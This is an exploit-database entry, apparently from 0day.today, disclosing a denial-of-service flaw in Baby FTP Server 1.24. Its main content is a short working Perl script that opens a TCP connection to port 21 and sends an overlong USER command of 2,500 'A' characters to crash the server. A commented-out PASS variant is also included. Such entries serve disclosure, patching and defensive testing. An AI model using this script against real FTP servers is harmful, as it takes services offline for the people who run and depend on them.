Baby FTP Server 1.24 - Denial Of Service

2013-06-26T00:00:00
ID 1337DAY-ID-20940
Type zdt
Reporter Chako
Modified 2013-06-26T00:00:00

Description

A bug discovered in Baby FTP Server Version 1.24 allows an attacker to cause a Denial of Service using a specially crafted request(USER, PASS...etc).

                                        
                                            #!/usr/bin/perl
use IO::Socket;
  
$TARGET = "127.0.0.1";
$PORT   = 21;
$JUNK = "\x41" x 2500;
  
$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";
 
  
$SOCKET = IO::Socket::INET->new(Proto=>'TCP', 
                                PeerHost=>$TARGET, 
                                PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";
  
$SOCKET->send($PAYLOAD);
  
close($SOCKET);

#  0day.today [2018-01-05]  #